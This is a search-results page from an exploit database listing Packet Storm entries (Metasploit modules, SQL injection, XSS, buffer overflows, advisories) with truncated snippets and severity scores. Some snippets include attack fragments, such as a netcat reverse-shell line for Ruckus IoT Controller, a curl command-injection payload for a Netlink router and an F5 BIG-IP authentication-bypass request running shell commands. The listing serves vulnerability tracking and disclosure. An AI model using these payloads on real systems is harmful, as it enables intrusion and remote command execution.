Lucene search
K
PacketstormMost viewed

50738 matches found

Packet Storm
Packet Storm
added 2023/09/19 12:0 a.m.611 views

Lexmark Device Embedded Web Server Remote Code Execution

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Lexmark Device Embedded Web Server RCE', 'Description' = %q A unauthenticated Remote Code Execution vulnerability exists in the embedded webserve...

9.8CVSS7.1AI score0.37835EPSS
Exploits4
Packet Storm
Packet Storm
added 2020/11/23 12:0 a.m.611 views

Boxoft Audio Converter 2.3.0 Buffer Overflow

Exploit Title: Boxoft Audio Converter 2.3.0 - '.wav' Buffer Overflow SEH Discovery by: Luis Martinez Discovery Date: 2020-11-22 Vendor Homepage: http://www.boxoft.com/ Software Link: http://www.boxoft.com/audio-converter/a-pdf-bac.exe Tested Version: 2.3.0 Vulnerability Type: Local Buffer Overflo...

0.3AI score
Exploits0
Packet Storm
Packet Storm
added 2021/10/15 12:0 a.m.610 views

i-Panel Administration System 2.0 Cross Site Scripting

Exploit Title: i-Panel Administration System 2.0 - Reflected Cross-site Scripting XSS Date: 04.10.2021 Exploit Author: Forster Chiu Vendor Homepage: https://www.hkurl.com Version: 2.0 Tested on: Chrome, Edge and Firefox CVE: CVE-2021-41878 Reference:...

4.3CVSS0.1AI score0.09912EPSS
Exploits4
Packet Storm
Packet Storm
added 2020/03/04 12:0 a.m.610 views

Exchange Control Panel Viewstate Deserialization

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'bindata' class MetasploitModule 'Exchange Control Panel Viewstate Deserialization', 'Description' = %q This module exploits a .NET serialization vulnerability i...

9CVSS0.9AI score0.99965EPSS
Exploits30
Packet Storm
Packet Storm
added 2019/11/07 12:0 a.m.610 views

Android Janus APK Signature Bypass

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core/payload/apk' class MetasploitModule "Android Janus APK Signature bypass", 'Description' = %q This module exploits CVE-2017-13156 in Android to install ...

7.2CVSS7.7AI score0.20089EPSS
Exploits9
Packet Storm
Packet Storm
added 2022/06/19 12:0 a.m.609 views

ChurchCRM 4.4.5 SQL Injection

Title: ChurchCRM 4.4.5 SQLi session hijacking L2 Author: nu11secur1ty Date: 05.11.2022 Vendor: https://churchcrm.io/ Software: https://github.com/ChurchCRM/CRM Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-31325 Description: There is a SQL Injection PWN cookie...

7.2CVSS7AI score0.04968EPSS
Exploits5
Packet Storm
Packet Storm
added 2021/03/09 12:0 a.m.609 views

Golden FTP Server 4.70 Buffer Overflow

Golden FTP Server 4.70 - 'PASS' Buffer Overflow 2 Author: 1F98D Original Authors: Craig Freyman cd1zz and Gerardo Iglesias Galvan iglesiasgg Tested on Windows 10 x64 A buffer overflow exists in GoldenFTP during the authentication process. Note that the source ip address of the user performing the...

7.5CVSS0.9AI score0.6681EPSS
Exploits5
Packet Storm
Packet Storm
added 2024/04/23 12:0 a.m.608 views

Visual Studio Code Execution

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Visual Studio vsix Extension Exec', 'Description' = %q Creates a vsix file which can be installed in Visual Studio Code as an extension. At...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2021/12/06 12:0 a.m.608 views

Simple Online Men's Salon Management System 1.0 SQL Injection

MSMS Vendor Description The password parameter on MSMS 1.0 appears to be vulnerable to SQL injection attacks. The predictive tests of this application interacted with that domain, indicating that the injected SQL query was executed. The attacker can retrieve all authentication and information abo...

0.3AI score
Exploits0
Packet Storm
Packet Storm
added 2021/08/19 12:0 a.m.608 views

Altus Sistemas de Automacao Products CSRF / Command Injection / Hardcoded Credentials

SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Multiple Critical Vulnerabilities product: Multiple Altus Sistemas de Automacao products: Nexto NX30xx Series Nexto NX5xxx Series Nexto Xpress XP3xx Series Hadron Xtorm...

9CVSS0.7AI score0.0624EPSS
Exploits15
Packet Storm
Packet Storm
added 2021/08/17 12:0 a.m.608 views

Lucee Administrator imgProcess.cfm Arbitrary File Write

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Lucee Administrator imgProcess.cfm Arbitrary File Write', 'Description' = %q This module exploits an arbitrary file write in Lucee Administrator'...

9.8CVSS0.7AI score0.89189EPSS
Exploits5
Packet Storm
Packet Storm
added 2020/11/23 12:0 a.m.608 views

LifeRay 7.2.1 GA2 Cross Site Scripting

Exploit Title: LifeRay 7.2.1 GA2 - Stored XSS Date: 10/05/2020 Exploit Author: 3ndG4me Vendor Homepage: https://www.liferay.com/ Software Link: https://www.liferay.com/ Version: 7.1.0 - 7.2.1 GA2 REQUIRED Tested on: Debian Linux CVE : CVE-2020-7934 Public Exploit/Whitepaper:...

3.5CVSS5.5AI score0.04457EPSS
Exploits3
Packet Storm
Packet Storm
added 2020/11/17 12:0 a.m.608 views

Grocy Household Management Solution 2.7.1 Cross Site Scripting

Exploit Author: Simran Sankhala Vendor Homepage: https://berrnd.de/ Software Link: https://github.com/grocy/grocy Version: 2.7.1 Tested on: Kali Linux 2020.3 CVE ID Alloted : CVE-2020-25454 Proof Of Concept: grocy household management solution v2.7.1, allows stored XSS , via Add recipe module, th...

5.6AI score0.00731EPSS
Exploits2
Packet Storm
Packet Storm
added 2020/11/17 12:0 a.m.608 views

Social Networking Site SQL Injection

Exploit Title: Social Networking Site - Authentication Bypass SQli Date: 2020-11-17 Exploit Author: gh1mau Email: [email protected] Team Members: Capt'N, muzzo, chaos689 | https://h0fclanmalaysia.wordpress.com/ Vendor Homepage:...

0.2AI score
Exploits0
Packet Storm
Packet Storm
added 2020/07/16 12:0 a.m.607 views

Vehicle Parking Management System 1.0 SQL Injection

Exploit Title: Vehicle Parking Management System 1.0 - Authentication Bypass Date: 2020-07-16 Exploit Author: gh1mau Team Members: Capt'N,muzzo,chaos689 | https://h0fclanmalaysia.wordpress.com/ Vendor Homepage: https://phpgurukul.com/vehicle-parking-management-system-using-php-and-mysql/ Software...

0.6AI score
Exploits0
Packet Storm
Packet Storm
added 2022/08/16 12:0 a.m.606 views

TypeORM 0.3.7 Information Disclosure

I found what I think is a vulnerability in the latest typeorm 0.3.7. TypeORM v0.3 has a new findOneBy method instead of findOneById and it is the only way to get a record by id Sending undefined as a value in this method removes this parameter from the query. This leads to the data exposure. For...

9.8CVSS9.7AI score0.20299EPSS
Exploits6
Packet Storm
Packet Storm
added 2021/06/11 12:0 a.m.606 views

Microsoft SharePoint Server 16.0.10372.20060 Server-Side Request Forgery

Exploit Title: Microsoft SharePoint Server 16.0.10372.20060 - 'GetXmlDataFromDataSource' Server-Side Request Forgery SSRF Date: 09 Jun 2021 Exploit Author: Alex Birnberg Software Link: https://www.microsoft.com/en-us/download/details.aspx?id=57462 Version: 16.0.10372.20060 Tested on: Windows Serv...

7.7AI score0.04563EPSS
Exploits4
Packet Storm
Packet Storm
added 2020/06/08 12:0 a.m.606 views

HFS Http File Server 2.3m Build 300 Buffer Overflow

Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/HFS-HTTP-FILE-SERVER-v2.3-REMOTE-BUFFER-OVERFLOW-DoS.txt + twitter.com/hyp3rlinx + ISR: ApparitionSec Vendor www.rejetto.com Product HFS Http File Server v2.3m Build 300...

0.6AI score0.30865EPSS
Exploits5
Packet Storm
Packet Storm
added 2024/10/10 12:0 a.m.605 views

Palo Alto Networks GlobalProtect Local Privilege Escalation

SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Local Privilege Escalation via MSI installer product: Palo Alto Networks GlobalProtect vulnerable version: 5.1.x, 5.2.x, 6.0.x, 6.1.x, =6.2.5, all other versions are not...

7.8CVSS9.7AI score0.06008EPSS
Exploits2
Packet Storm
Packet Storm
added 2024/09/01 12:0 a.m.605 views

Microsoft IIS HTTP Internal IP Disclosure

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Microsoft IIS HTTP Internal IP Disclosure', 'Description' = %q Collect any leaked internal IPs by requesting commonly redirected locations from...

2.6CVSS7AI score0.76558EPSS
Exploits4
Packet Storm
Packet Storm
added 2020/11/01 12:0 a.m.605 views

Apache Flink 1.9.x Shell Upload

!/usr/bin/env python3 coding: utf-8 Exploit Title: Apache Flink 1.9.x - File Upload RCE Unauthenticated Google Dork: None Date: 2020.11.01 Exploit Author: bigger.wing Vendor Homepage: https://flink.apache.org/ Software Link: https://flink.apache.org/downloads.html Version: 1.9.x Tested on:...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2022/05/11 12:0 a.m.604 views

Wondershare Dr.Fone 11.4.10 Insecure Permissions

Exploit Title: Wondershare Dr.Fone 11.4.10 - Insecure File Permissions Date: 04/25/2022 Exploit Author: AkuCyberSec https://github.com/AkuCyberSec Vendor Homepage: https://drfone.wondershare.com/ Software Link: https://download.wondershare.com/drfonefull3360.exe Version: 11.4.10 Tested on: Window...

0.2AI score
Exploits0
Packet Storm
Packet Storm
added 2021/12/09 12:0 a.m.604 views

Microsoft Office Word MSHTML Remote Code Execution

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Microsoft Office Word Malicious MSHTML RCE', 'Description' = %q This module creates a malicious docx file that when opened in Word on a vulnerabl...

8.8CVSS0.96843EPSS
Exploits38
Packet Storm
Packet Storm
added 2020/11/30 12:0 a.m.604 views

Online Job Portal In PHP/PDO 1.0 SQL Injection

Title: online job portal phppdo v1.0 - SQL injection Exploit Author: Mohamed Elobeid 0b3!d Date: 2020-08-21 Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html Software Link:...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2020/11/27 12:0 a.m.604 views

ElkarBackup 1.3.3 Cross Site Scripting

Exploit Title: ElkarBackup 1.3.3 - 'Policyname' and 'PolicyDescription' Stored Cross-site Scripting Date: 2020-08-22 Exploit Author: Vyshnav NK Vendor Homepage: https://www.elkarbackup.org/ Software Link: https://github.com/elkarbackup/elkarbackup/wiki/Installation Version: 1.3.3 Tested on: Linux...

0.1AI score
Exploits0
Packet Storm
Packet Storm
added 2020/11/27 12:0 a.m.604 views

Best Support System 3.0.4 Cross Site Scripting

Exploit Title: Best Support System 3.0.4 - 'ticketbody' Persistent XSS Authenticated Google Dork: "Powered By Best Support System" Date: 2020-08-23 Exploit Author: Ex.Mi https://ex-mi.ru Vendor: Appsbd https://appsbd.com Software Version: 3.0.4 Software Link:...

3.5CVSS5.6AI score0.01853EPSS
Exploits2
Packet Storm
Packet Storm
added 2020/11/27 12:0 a.m.604 views

Ruckus IoT Controller 1.5.1.0.21 Remote Code Execution

Product: Ruckus IoT Controller Ruckus vRIoT Version: &1|nc "+lhost+" "+lport+" /tmp/f; " return payload def generateMagicToken: encdecmethod = 'utf-8' salt = 'nplusServiceAuth' salt = salt.encode"utf8" strkey = 'serviceN1authent' strtoenc = 'TlBMVVMx' return encryptencdecmethod, salt, strkey,...

9CVSS0.1AI score0.11453EPSS
Exploits3
Packet Storm
Packet Storm
added 2020/09/14 12:0 a.m.604 views

Joomla! paGO Commerce 2.5.9.0 SQL Injection

Exploit Title: Joomla! paGO Commerce 2.5.9.0 - SQL Injection Authenticated Date: 2020-08-21 Exploit Author: Mehmet Kelepçe / Gais Cyber Security Author ID: 8763 Vendor Homepage: https://www.corephp.com/ Software Link: https://www.corephp.com/joomla-products/pago-commerce Version: 2.5.9.0 Tested o...

0.4AI score
Exploits0
Packet Storm
Packet Storm
added 2020/06/18 12:0 a.m.604 views

OpenCTI 3.3.1 Cross Site Scripting / Directory Traversal

Exploit Title: OpenCTI 3.3.1 - Directory Traversal Date: 2020-03-05 Exploit Author: Raif Berkay Dincel Vendor Homepage: www.opencti.io/ Software https://github.com/OpenCTI-Platform/opencti/releases/tag/3.3.1 Version: 3.3.1 CVE-ID: N/A Tested on: Linux Mint / Windows 10 Vulnerabilities Discovered...

Exploits0
Packet Storm
Packet Storm
added 2016/12/03 12:0 a.m.604 views

Apache ActiveMQ 5.11.1 / 5.13.2 Directory Traversal / Command Execution

I have recently been playing with Apache ActiveMQ, and came across a simple but interesting directory traversal flaw in the fileserver upload/download functionality. I have only been able to reproduce this on Windows, i.e. where "" is a path delimiter. An attacker could use this flaw to upload...

7.5CVSS0.5AI score0.98518EPSS
Exploits28
Packet Storm
Packet Storm
added 2023/07/11 12:0 a.m.603 views

Boomerang Parental Control App Cross Site Scripting / Privilege Escalation

SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Stored XSS & Privilege Escalation product: Boomerang Parental Control App vulnerable version: =13.83 only issue 1, rest not fixed CVE number: CVE-2023-36620, CVE-2023-366...

7.1AI score0.01098EPSS
Exploits2
Packet Storm
Packet Storm
added 2022/11/30 12:0 a.m.603 views

OX App Suite 7.10.6 Cross Site Scripting / SSRF / Resource Consumption

Product: OX App Suite Vendor: OX Software GmbH Internal reference: OXUIB-1654 Vulnerability type: Cross-Site Scripting CWE-80 Vulnerable version: 7.10.6 and earlier Vulnerable component: frontend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.10.5-rev37, 7.10.6-rev...

6.1AI score0.00916EPSS
Exploits9
Packet Storm
Packet Storm
added 2021/07/28 12:0 a.m.602 views

Backdoor.Win32.WinShell.40 Code Execution

Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/c98e23742807f3cb5a095f34e0eb0e52.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.WinShell.40 Vulnerability: Unauthenticated Remote Command Execution Description: The...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2020/12/10 12:0 a.m.602 views

Openfire 4.6.0 Cross Site Scripting

Exploit Title: Openfire 4.6.0 - 'path' Stored XSS Date: 20201209 Exploit Author: j5s Vendor Homepage: https://github.com/igniterealtime/Openfire Software Link: https://www.igniterealtime.org/downloads/ Version: 4.6.0 POST /plugins/nodejs/nodejs.jsp HTTP/1.1 Host: 192.168.137.137:9090 User-Agent:...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2019/05/30 12:0 a.m.602 views

Microsoft Windows Remote Desktop BlueKeep Denial Of Service

import socket, sys, struct from OpenSSL import SSL from impacket.structure import Structure I'm not responsible for what you use this to accomplish and should only be used for education purposes Could clean these up since I don't even use them class TPKTStructure: commonHdr = 'Version','B=3',...

10CVSS10AI score0.99999EPSS
Exploits123
Packet Storm
Packet Storm
added 2018/11/16 12:0 a.m.602 views

Intel Rapid Storage Technology User Interface And Driver 15.9.0.1015 DLL Hijacking

Hi @ll, the executable installer of the Intelr Rapid Storage Technology Intelr RST User Interface and Driver, version 15.9.0.1015 LATEST for Windows 7, released 11/14/2017, available from via is SURPRISE! vulnerable! CVSS score: 7.5/HIGH CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H See Intel's...

0.00383EPSS
Exploits1
Packet Storm
Packet Storm
added 2024/02/05 12:0 a.m.601 views

Sumatra PDF 3.5.2 DLL Hijacking

Exploit Title: Sumatra PDF 3.5.2 DLL Hijacking Date: 06.02.2024 Exploit Author: Ravishanka Silva Vendor Homepage: https://www.sumatrapdfreader.org/free-pdf-reader Software Link: https://www.sumatrapdfreader.org/download-free-pdf-viewer Version: 3.5.2 Tested on: Windows 10, Windows 11 CVE :...

7.4AI score
Exploits1
Packet Storm
Packet Storm
added 2022/08/01 12:0 a.m.601 views

mPDF 7.0 Local File Inclusion

Exploit Title: mPDF 7.0 - Local File Inclusion Google Dork: N/A Date: 2022-07-23 Exploit Author: Musyoka Ian Vendor Homepage: https://mpdf.github.io/ Software Link: https://mpdf.github.io/ Version: CuteNews Tested on: Ubuntu 20.04, mPDF 7.0.x CVE: N/A !/usr/bin/env python3 from urllib.parse impor...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2022/05/09 12:0 a.m.601 views

F5 BIG-IP Remote Code Execution

F5 BIG-IP RCE exploitation CVE-2022-1388 POST 1: POST /mgmt/tm/util/bash HTTP/1.1 Host: :8443 Authorization: Basic YWRtaW46 Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: 0 "command": "run" , "utilCmdArgs": " -c 'id' " curl commandliner: $ curl -i -s -k -X $'POST' -H $'Host: :8443' -H...

9.8CVSS10AI score0.99956EPSS
Exploits63
Packet Storm
Packet Storm
added 2021/10/28 12:0 a.m.601 views

Sophos UTM WebAdmin SID Command Injection

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Sophos UTM WebAdmin SID Command Injection', 'Description' = %q This module exploits an SID-based command injection in Sophos UTM's WebAdmin...

10CVSS0.1AI score0.96693EPSS
Exploits9
Packet Storm
Packet Storm
added 2021/06/28 12:0 a.m.601 views

WordPress wpDiscuz 7.0.4 Shell Upload

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'WordPress wpDiscuz Unauthenticated File Upload Vulnerability', 'Description' = %q This module exploits an arbitrary file upload in the WordPress...

7.5CVSS0.94535EPSS
Exploits19
Packet Storm
Packet Storm
added 2020/03/18 12:0 a.m.601 views

Netlink GPON Router 1.0.11 Remote Code Execution

Exploit Title: Netlink GPON Router 1.0.11 - Remote Code Execution Date: 2020-03-17 Exploit Author: shellord Vendor Homepage: https://www.netlink-india.com/ Version: 1.0.11 Tested on: Windows 10 CVE: N/A Exploit : curl -L -d "targetaddr=;ls /&waninf=1INTERNETRVID154"...

0.1AI score
Exploits0
Packet Storm
Packet Storm
added 2019/11/21 12:0 a.m.601 views

TestLink 1.9.19 Cross Site Scripting

Exploit Title: TestLink 1.9.19 - Persistent Cross-Site Scripting Date: 2019-11-20 Exploit Author: Milad Khoshdel Software Link: http://testlink.org/ Version: TestLink 1.9.19 Tested on: Linux Apache/2 PHP/7.3.11 ========= Vulnerable Pages: ========= Persistent --...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2011/10/15 12:0 a.m.601 views

AV Arcade Pro 5.4.3 Cookie Manipulation

========================================== AV Arcade Pro 5.4.3 By pass Seting Exploit ========================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=0 0 . .--. .--. .---. . 1 1 .'| / | 0 0 | --: --: / .-.| .-. . . 1 1 | / | | | 0 0 '---' --' --' ' -'--'---| 1 1 ;...

0.4AI score
Exploits0
Packet Storm
Packet Storm
added 2021/11/17 12:0 a.m.600 views

LiquidFiles 3.5.13 Privilege Escalation

=============================================================================== title: LiquidFiles Privilege Escalation product: LiquidFiles v3.5.13 vulnerability type: Privilege Escalation severity: Medium CVSSv3 score: 6.7 CVSSv3 vector: AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L found: 2021-10-29 by:...

9CVSS8.7AI score0.03695EPSS
Exploits3
Packet Storm
Packet Storm
added 2021/11/08 12:0 a.m.600 views

Backdoor.Win32.VB.afu Insecure Transit

Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/c6ba7fcb9eb9bdd7e081e2e84e784dcbB.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.VB.afu Vulnerability: Insecure Transit Password Disclosure Description: The malware...

7.1AI score
Exploits0
Packet Storm
Packet Storm
added 2020/12/03 12:0 a.m.600 views

Online Matrimonial Project 1.0 Remote Code Execution

Exploit Title: Online Matrimonial Project 1.0 - Authenticated Remote Code Execution Exploit Author: Valerio Alessandroni Date: 2020-10-07 Vendor Homepage: https://projectworlds.in/ Software Link: https://projectworlds.in/free-projects/php-projects/online-matrimonial-project-in-php/ Source Link:...

0.6AI score
Exploits0
Packet Storm
Packet Storm
added 2020/11/27 12:0 a.m.600 views

WordPress Wibar Theme 1.1.8 Cross Site Scripting

Exploit Title: Wordpress Theme Wibar 1.1.8 - 'Brand Component' Stored Cross Site Scripting Date: 11/27/2020 Exploit Author: Ilca Lucian Florin Vendor Homepage: http://demo.themeftc.com/wibar Software Link: https://themeforest.net/item/wibar-responsive-woocommerce-wordpress-theme/20994798 Version:...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2020/10/29 12:0 a.m.600 views

Lot Reservation Management System 1.0 Cross Site Scripting

Exploit Title: lot reservation management system 1.0 - Stored Cross Site Scripting Date: 2020-10-22 Exploit Author: Ankita Pal Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html Software Link:...

Exploits0
Packet Storm
Packet Storm
added 2024/03/21 12:0 a.m.599 views

OpenNMS Horizon 31.0.7 Remote Command Execution

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'OpenNMS Horizon Authenticated RCE', 'Description' = %q This module exploits built-in functionality in OpenNMS Horizon in order to execute arbitra...

8.2CVSS7.4AI score0.02951EPSS
Exploits3
Total number of security vulnerabilities5000